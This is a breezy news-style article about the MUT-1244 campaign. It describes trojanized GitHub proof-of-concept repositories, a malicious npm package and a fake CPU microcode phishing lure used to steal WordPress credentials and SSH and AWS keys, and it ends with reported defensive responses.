Introduction

A threat actor, whimsically dubbed MUT-1244 (short for “Mysterious Unattributed Threat”), has pulled off a heist that would make even the most seasoned cybercriminals tip their hats. Over the course of a year, this elusive entity managed to swipe over 390,000 WordPress credentials, along with SSH keys and AWS access keys, all while mining Monero cryptocurrency on the side. It’s like a digital Ocean’s Eleven, but with more coding and less George Clooney.

The Plot Unfolds

The Mastermind: MUT-1244

MUT-1244 is not your average cybercriminal. This threat actor has been meticulously orchestrating a large-scale campaign that targeted not just any victims, but other threat actors. It’s a bit like a thief robbing other thieves, which, let’s be honest, adds a certain flair to the whole operation. The campaign involved a trojanized WordPress credentials checker, which was cleverly disguised to lure in unsuspecting victims (Bleeping Computer).

The Tools of the Trade

MUT-1244’s toolkit was as sophisticated as it was sneaky. The operation involved the use of trojanized GitHub repositories, which delivered malicious proof-of-concept (PoC) exploits targeting known security flaws. These repositories were cleverly camouflaged as legitimate tools, enticing security professionals, penetration testers, and even malicious actors themselves to download and execute the payloads (The Hacker News).

But wait, there’s more! The campaign also featured a phishing component, where victims were tricked into installing a fake kernel upgrade masquerading as a CPU microcode update. This phishing tactic was particularly effective, as it played on the victims’ trust and urgency to keep their systems up to date (Security Boulevard).

The Heist in Action

The GitHub Gambit

The GitHub repositories used in this campaign were a stroke of genius. By hosting trojanized PoC code, MUT-1244 was able to exploit known vulnerabilities, drawing in victims who were actively seeking solutions to these security flaws. One such repository, humorously named “Yet Another WordPress Poster,” was a covert operation that enabled the exfiltration of over 390,000 WordPress credentials (The Nimble Nerd).

The malicious code was hidden within an npm package, which was downloaded approximately 1,790 times before it was taken down. This package, named @0xengine/xmlrpc, was a JavaScript-based XML-RPC server and client for Node.js, adding an extra layer of deception to the operation (The Hacker News).

The Phishing Phenom

The phishing campaign was another key element of MUT-1244’s strategy. Victims received emails titled “Notification: Important CPU Microcode Update for High-Performance Computing (HPC) Users Inbox,” prompting them to install a fake kernel upgrade. This social engineering tactic, known as a ClickFix attack, was particularly novel as it targeted Linux systems, a first in the documented history of such attacks (Security Labs Datadog).

Once the victims clicked on the link, they were directed to a malicious website that instructed them to copy and paste a piece of code. This code executed a script from a GitHub repository, which then deployed a second-stage info-stealing payload. The sophistication of this phishing tactic highlights MUT-1244’s deep understanding of both technical vulnerabilities and human psychology (Security Boulevard).

The Aftermath

The Impact

The impact of MUT-1244’s campaign is significant. With over 390,000 WordPress credentials compromised, along with SSH keys and AWS access keys, the potential for further exploitation is vast. The victims, believed to include red teamers, penetration testers, and security researchers, now face the daunting task of securing their systems and mitigating any potential damage (Bleeping Computer).

The Response

In response to this audacious heist, GitHub has removed the malicious repositories, and security researchers are working tirelessly to unravel the full extent of the operation. The cybersecurity community is on high alert, with experts urging users to exercise caution when downloading PoC code and to verify the authenticity of any updates or patches before installation (The Hacker News).